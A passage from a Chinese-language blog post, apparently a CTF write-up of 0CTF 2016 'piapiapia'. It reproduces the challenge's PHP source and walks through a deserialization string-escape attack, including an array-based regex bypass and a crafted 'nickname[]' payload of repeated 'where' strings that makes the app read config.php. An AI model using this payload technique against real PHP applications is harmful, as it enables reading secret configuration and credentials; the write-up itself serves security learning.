class="built_in">parent</span>::filter($password);</span><br><span class="line"></span><br><span class="line">		$where = <span class="string">&quot;username = &#x27;$username&#x27;&quot;</span>;</span><br><span class="line">		$object = <span class="built_in">parent</span>::select(<span class="keyword">$this</span>-&gt;table, $where);</span><br><span class="line">		<span class="keyword">if</span> ($object &amp;&amp; $object-&gt;password === md5($password)) &#123;</span><br><span class="line">			<span class="keyword">return</span> <span class="literal">true</span>;</span><br><span class="line">		&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">			<span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">show_profile</span>(<span class="params">$username</span>) </span>&#123;</span><br><span class="line">		$username = <span class="built_in">parent</span>::filter($username);</span><br><span class="line"></span><br><span class="line">		$where = <span class="string">&quot;username = &#x27;$username&#x27;&quot;</span>;</span><br><span class="line">		$object = <span class="built_in">parent</span>::select(<span class="keyword">$this</span>-&gt;table, $where);</span><br><span class="line">		<span class="keyword">return</span> $object-&gt;profile;</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">update_profile</span>(<span class="params">$username, $new_profile</span>) </span>&#123;</span><br><span class="line">		$username = <span class="built_in">parent</span>::filter($username);</span><br><span class="line">		$new_profile = <span class="built_in">parent</span>::filter($new_profile);</span><br><span class="line"></span><br><span class="line">		$where = <span class="string">&quot;username = &#x27;$username&#x27;&quot;</span>;</span><br><span class="line">		<span class="keyword">return</span> <span class="built_in">parent</span>::update(<span class="keyword">$this</span>-&gt;table, <span class="string">&#x27;profile&#x27;</span>, $new_profile, $where);</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__tostring</span>(<span class="params"></span>) </span>&#123;</span><br><span class="line">		<span class="keyword">return</span> <span class="keyword">__class__</span>;</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">mysql</span> </span>&#123;</span><br><span class="line">	<span class="keyword">private</span> $link = <span class="literal">null</span>;</span><br><span class="line"></span><br><span class="line">	<span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">connect</span>(<span class="params">$config</span>) </span>&#123;</span><br><span class="line">		<span class="keyword">$this</span>-&gt;link = mysql_connect(</span><br><span class="line">			$config[<span class="string">&#x27;hostname&#x27;</span>],</span><br><span class="line">			$config[<span class="string">&#x27;username&#x27;</span>], </span><br><span class="line">			$config[<span class="string">&#x27;password&#x27;</span>]</span><br><span class="line">		);</span><br><span class="line">		mysql_select_db($config[<span class="string">&#x27;database&#x27;</span>]);</span><br><span class="line">		mysql_query(<span class="string">&quot;SET sql_mode=&#x27;strict_all_tables&#x27;&quot;</span>);</span><br><span class="line"></span><br><span class="line">		<span class="keyword">return</span> <span class="keyword">$this</span>-&gt;link;</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	<span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">select</span>(<span class="params">$table, $where, $ret = <span class="string">&#x27;*&#x27;</span></span>) </span>&#123;</span><br><span class="line">		$sql = <span class="string">&quot;SELECT $ret FROM $table WHERE $where&quot;</span>;</span><br><span class="line">		$result = mysql_query($sql, <span class="keyword">$this</span>-&gt;link);</span><br><span class="line">		<span class="keyword">return</span> mysql_fetch_object($result);</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	<span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">insert</span>(<span class="params">$table, $key_list, $value_list</span>) </span>&#123;</span><br><span class="line">		$key = implode(<span class="string">&#x27;,&#x27;</span>, $key_list);</span><br><span class="line">		$value = <span class="string">&#x27;\&#x27;&#x27;</span> . implode(<span class="string">&#x27;\&#x27;,\&#x27;&#x27;</span>, $value_list) . <span class="string">&#x27;\&#x27;&#x27;</span>; </span><br><span class="line">		$sql = <span class="string">&quot;INSERT INTO $table ($key) VALUES ($value)&quot;</span>;</span><br><span class="line">		<span class="keyword">return</span> mysql_query($sql);</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	<span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">update</span>(<span class="params">$table, $key, $value, $where</span>) </span>&#123;</span><br><span class="line">		$sql = <span class="string">&quot;UPDATE $table SET $key = &#x27;$value&#x27; WHERE $where&quot;</span>;</span><br><span class="line">		<span class="keyword">return</span> mysql_query($sql);</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	<span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">filter</span>(<span class="params">$string</span>) </span>&#123;</span><br><span class="line">		$escape = <span class="keyword">array</span>(<span class="string">&#x27;\&#x27;&#x27;</span>, <span class="string">&#x27;\\\\&#x27;</span>);</span><br><span class="line">		$escape = <span class="string">&#x27;/&#x27;</span> . implode(<span class="string">&#x27;|&#x27;</span>, $escape) . <span class="string">&#x27;/&#x27;</span>;</span><br><span class="line">		$string = preg_replace($escape, <span class="string">&#x27;_&#x27;</span>, $string);</span><br><span class="line"></span><br><span class="line">		$safe = <span class="keyword">array</span>(<span class="string">&#x27;select&#x27;</span>, <span class="string">&#x27;insert&#x27;</span>, <span class="string">&#x27;update&#x27;</span>, <span class="string">&#x27;delete&#x27;</span>, <span class="string">&#x27;where&#x27;</span>);</span><br><span class="line">		$safe = <span class="string">&#x27;/&#x27;</span> . implode(<span class="string">&#x27;|&#x27;</span>, $safe) . <span class="string">&#x27;/i&#x27;</span>;</span><br><span class="line">		<span class="keyword">return</span> preg_replace($safe, <span class="string">&#x27;hacker&#x27;</span>, $string);</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__tostring</span>(<span class="params"></span>) </span>&#123;</span><br><span class="line">		<span class="keyword">return</span> <span class="keyword">__class__</span>;</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line">session_start();</span><br><span class="line">$user = <span class="keyword">new</span> user();</span><br><span class="line">$user-&gt;connect($config);</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>​    register.php</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">	require_once(&#39;class.php&#39;);</span><br><span class="line">	if($_POST[&#39;username&#39;] &amp;&amp; $_POST[&#39;password&#39;]) &#123;</span><br><span class="line">		$username &#x3D; $_POST[&#39;username&#39;];</span><br><span class="line">		$password &#x3D; $_POST[&#39;password&#39;];</span><br><span class="line"></span><br><span class="line">		if(strlen($username) &lt; 3 or strlen($username) &gt; 16) </span><br><span class="line">			die(&#39;Invalid user name&#39;);</span><br><span class="line"></span><br><span class="line">		if(strlen($password) &lt; 3 or strlen($password) &gt; 16) </span><br><span class="line">			die(&#39;Invalid password&#39;);</span><br><span class="line">		if(!$user-&gt;is_exists($username)) &#123;</span><br><span class="line">			$user-&gt;register($username, $password);</span><br><span class="line">			echo &#39;Register OK!&lt;a href&#x3D;&quot;index.php&quot;&gt;Please Login&lt;&#x2F;a&gt;&#39;;		</span><br><span class="line">		&#125;</span><br><span class="line">		else &#123;</span><br><span class="line">			die(&#39;User name Already Exists&#39;);</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br><span class="line">	else &#123;</span><br><span class="line">?&gt;</span><br><span class="line">&lt;html&gt;</span><br><span class="line">......[省略html代码]</span><br><span class="line">&lt;&#x2F;html&gt;</span><br><span class="line">&lt;?php</span><br><span class="line">	&#125;</span><br><span class="line">?&gt;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>​    update.php</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">	require_once(&#39;class.php&#39;);</span><br><span class="line">	if($_SESSION[&#39;username&#39;] &#x3D;&#x3D; null) &#123;</span><br><span class="line">		die(&#39;Login First&#39;);	</span><br><span class="line">	&#125;</span><br><span class="line">	if($_POST[&#39;phone&#39;] &amp;&amp; $_POST[&#39;email&#39;] &amp;&amp; $_POST[&#39;nickname&#39;] &amp;&amp; $_FILES[&#39;photo&#39;]) &#123;</span><br><span class="line"></span><br><span class="line">		$username &#x3D; $_SESSION[&#39;username&#39;];</span><br><span class="line">		if(!preg_match(&#39;&#x2F;^\d&#123;11&#125;$&#x2F;&#39;, $_POST[&#39;phone&#39;]))</span><br><span class="line">			die(&#39;Invalid phone&#39;);</span><br><span class="line"></span><br><span class="line">		if(!preg_match(&#39;&#x2F;^[_a-zA-Z0-9]&#123;1,10&#125;@[_a-zA-Z0-9]&#123;1,10&#125;\.[_a-zA-Z0-9]&#123;1,10&#125;$&#x2F;&#39;, $_POST[&#39;email&#39;]))</span><br><span class="line">			die(&#39;Invalid email&#39;);</span><br><span class="line"></span><br><span class="line">		if(preg_match(&#39;&#x2F;[^a-zA-Z0-9_]&#x2F;&#39;, $_POST[&#39;nickname&#39;]) || strlen($_POST[&#39;nickname&#39;]) &gt; 10)</span><br><span class="line">			die(&#39;Invalid nickname&#39;);</span><br><span class="line"></span><br><span class="line">		$file &#x3D; $_FILES[&#39;photo&#39;];</span><br><span class="line">		if($file[&#39;size&#39;] &lt; 5 or $file[&#39;size&#39;] &gt; 1000000)</span><br><span class="line">			die(&#39;Photo size error&#39;);</span><br><span class="line"></span><br><span class="line">		move_uploaded_file($file[&#39;tmp_name&#39;], &#39;upload&#x2F;&#39; . md5($file[&#39;name&#39;]));</span><br><span class="line">		$profile[&#39;phone&#39;] &#x3D; $_POST[&#39;phone&#39;];</span><br><span class="line">		$profile[&#39;email&#39;] &#x3D; $_POST[&#39;email&#39;];</span><br><span class="line">		$profile[&#39;nickname&#39;] &#x3D; $_POST[&#39;nickname&#39;];</span><br><span class="line">		$profile[&#39;photo&#39;] &#x3D; &#39;upload&#x2F;&#39; . md5($file[&#39;name&#39;]);</span><br><span class="line"></span><br><span class="line">		$user-&gt;update_profile($username, serialize($profile));</span><br><span class="line">		echo &#39;Update Profile Success!&lt;a href&#x3D;&quot;profile.php&quot;&gt;Your Profile&lt;&#x2F;a&gt;&#39;;</span><br><span class="line">	&#125;</span><br><span class="line">	else &#123;</span><br><span class="line">?&gt;</span><br><span class="line">&lt;html&gt;</span><br><span class="line">......[省略html代码]</span><br><span class="line">&lt;&#x2F;html&gt;</span><br><span class="line">&lt;?php</span><br><span class="line">	&#125;</span><br><span class="line">?&gt;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>​    profile.php</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">	require_once(&#39;class.php&#39;);</span><br><span class="line">	if($_SESSION[&#39;username&#39;] &#x3D;&#x3D; null) &#123;</span><br><span class="line">		die(&#39;Login First&#39;);	</span><br><span class="line">	&#125;</span><br><span class="line">	$username &#x3D; $_SESSION[&#39;username&#39;];</span><br><span class="line">	$profile&#x3D;$user-&gt;show_profile($username);</span><br><span class="line">	if($profile  &#x3D;&#x3D; null) &#123;</span><br><span class="line">		header(&#39;Location: update.php&#39;);</span><br><span class="line">	&#125;</span><br><span class="line">	else &#123;</span><br><span class="line">		$profile &#x3D; unserialize($profile);</span><br><span class="line">		$phone &#x3D; $profile[&#39;phone&#39;];</span><br><span class="line">		$email &#x3D; $profile[&#39;email&#39;];</span><br><span class="line">		$nickname &#x3D; $profile[&#39;nickname&#39;];</span><br><span class="line">		$photo &#x3D; base64_encode(file_get_contents($profile[&#39;photo&#39;]));</span><br><span class="line">?&gt;</span><br><span class="line">&lt;html&gt;</span><br><span class="line">......[省略html代码]</span><br><span class="line">&lt;&#x2F;html&gt;</span><br><span class="line">&lt;?php</span><br><span class="line">	&#125;</span><br><span class="line">?&gt;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>​    config.php</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">	$config[<span class="string">&#x27;hostname&#x27;</span>] = <span class="string">&#x27;127.0.0.1&#x27;</span>;</span><br><span class="line">	$config[<span class="string">&#x27;username&#x27;</span>] = <span class="string">&#x27;root&#x27;</span>;</span><br><span class="line">	$config[<span class="string">&#x27;password&#x27;</span>] = <span class="string">&#x27;&#x27;</span>;</span><br><span class="line">	$config[<span class="string">&#x27;database&#x27;</span>] = <span class="string">&#x27;&#x27;</span>;</span><br><span class="line">	$flag = <span class="string">&#x27;&#x27;</span>;</span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>发现<code>config.php</code>中有我们想要的flag.发现网页还有个注册接口，随便注册一个账号登陆上去，随后发现一个文件上传接口，这里可以首先考虑到上传一个木马，不过发现尽管没有过滤，而且我们也知道上传目录，但是因为文件名被md5加密，故无法使用蚁剑连接。</p>
<p>这个时候仔细审计一下代码，发现profile.php中有一个<code>file_get_contents</code>函数，同时发现了序列化和反序列化，序列化内容可控，这个时候可以考虑通过反序列化将<code>$profile</code>中的<code>photo</code>属性改变为<code>config.php</code>。</p>
<p>这个时候目标明确了，仔细审计<code>update.php</code>代码，发现有几个过滤，先是对输入的内容格式进行正则匹配，随后将输入的前三项内容和第四项内容的上传路径进行序列化，随后传给<code>update_profile</code>函数进行处理，跟进<code>update_profile</code>发现对<code>$username</code>和<code>$profile</code>进行过滤，跟进<code>filter</code>函数发现会将<code>&#39;</code>和<code>\\</code>替换成<code>_</code>，并将<code>&#39;select&#39; &#39;insert&#39; &#39;update&#39; &#39;delete&#39; &#39;where&#39;</code>替换为<code>&#39;hacker&#39;</code>。这个时候我们发现了重点：<code>filter</code>函数会将<code>where</code>替换成<code>hacker</code>，替换后字符串的长度发生了改变，而序列化字符串中字符串长度未改变，这个时候我们就可以通过反序列化字符串逃逸来实现将<code>file_get_contents</code>中的内容替换为<code>config.php</code>。</p>
<p>但是我们需要先绕过第一个正则匹配，这个时候我们需要一个前置知识：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">md5(<span class="keyword">Array</span>()) = <span class="literal">null</span></span><br><span class="line">sha1(<span class="keyword">Array</span>()) = <span class="literal">null</span></span><br><span class="line">ereg(pattern,<span class="keyword">Array</span>()) = <span class="literal">null</span></span><br><span class="line">preg_match(pattern,<span class="keyword">Array</span>()) = <span class="literal">false</span></span><br><span class="line">strcmp(<span class="keyword">Array</span>(),<span class="string">&quot;some_string&quot;</span>) = <span class="literal">null</span></span><br><span class="line">strpos(<span class="keyword">Array</span>(),<span class="string">&quot;some_string&quot;</span>) = <span class="literal">null</span></span><br><span class="line">strlen(<span class="keyword">Array</span>()) = <span class="literal">null</span></span><br></pre></td></tr></table></figure>

<p>所以我们只需要将<code>nickname</code>替换成数组即可。</p>
<p>我们构造如下payload:</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nickname[]=wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere&quot;;&#125;s:5:&quot;photo&quot;;s:10:&quot;config.php&quot;;&#125;</span><br></pre></td></tr></table></figure>

<p>解释一下这个payload的构造原理，<code>nickname[]</code>被反序列化之后会变成<code>a:1:&#123;i:0;s:204:&quot;...&quot;;&#125;</code>，所以<code>where</code>后面的<code>&quot;;&#125;</code>用来闭合被替换后的序列化字符串中的第三个数组部分，同时由于<code>&quot;;&#125;s:5:&quot;photo&quot;;s:10:&quot;config.php&quot;;&#125;</code>长度为34，我们需要将这34个字符挤出profile数组的第三位(我们为了绕过正则而构造的数组位)，所以利用filter中where替换成hacker会多出1位，构造34个where，从而反序列化时成功将第三位闭合。</p>
<p>最终执行效果：</p>
<img src="/assets/img/php反序列化尾部字符串逃逸学习/php反序列化尾部字符串逃逸学习1.jpg">

<img src="/assets/img/php反序列化尾部字符串逃逸学习/php反序列化尾部字符串逃逸学习2.jpg">

<img src="/assets/img/php反序列化尾部字符串逃逸学习/php反序列化尾部字符串逃逸学习3.jpg">

<p>成功获得flag。</p>
<h2 id="0x03-总结"><a href="#0x03-总结" class="headerlink" title="0x03 总结"></a>0x03 总结</h2><p>web是个无底洞..知识点太多太杂了，所以还是要多总结，这样学习效率才高。还是太菜了，慢慢加油叭。</p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/web%E5%AE%89%E5%85%A8/" rel="tag"># web安全</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2020/08/28/sql%E6%B3%A8%E5%85%A5%E6%80%BB%E7%BB%93%EF%BC%88%E4%B8%80%EF%BC%89/" rel="prev" title="sql注入总结（一）">
      <i class="fa fa-chevron-left"></i> sql注入总结（一）
    </a></div>
      <div class="post-nav-item">
    <a href="/2020/08/28/php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%80%BB%E7%BB%93/" rel="next" title="php反序列化总结">
      php反序列化总结 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#0x00-%E9%A6%96%E5%85%88%E7%9C%8B%E4%B8%80%E4%B8%8B%E4%BB%80%E4%B9%88%E6%98%AF%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96"><span class="nav-number">1.</span> <span class="nav-text">0x00 首先看一下什么是反序列化</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x01-php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%B0%BE%E9%83%A8%E5%AD%97%E7%AC%A6%E4%B8%B2%E9%80%83%E9%80%B8"><span class="nav-number">2.</span> <span class="nav-text">0x01 php反序列化尾部字符串逃逸</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x02-0CTF-2016-piapiapia-%E8%A7%A3%E9%A2%98%E6%80%9D%E8%B7%AF"><span class="nav-number">3.</span> <span class="nav-text">0x02 [0CTF 2016]piapiapia 解题思路</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x03-%E6%80%BB%E7%BB%93"><span class="nav-number">4.</span> <span class="nav-text">0x03 总结</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">John Doe</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives">
        
          <span class="site-state-item-count">25</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories">
          
        <span class="site-state-item-count">10</span>
        <span class="site-state-item-name">categories</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags">
          
        <span class="site-state-item-count">8</span>
        <span class="site-state-item-name">tags</span></a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">John Doe</span>
</div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://mist.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Mist</a>
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
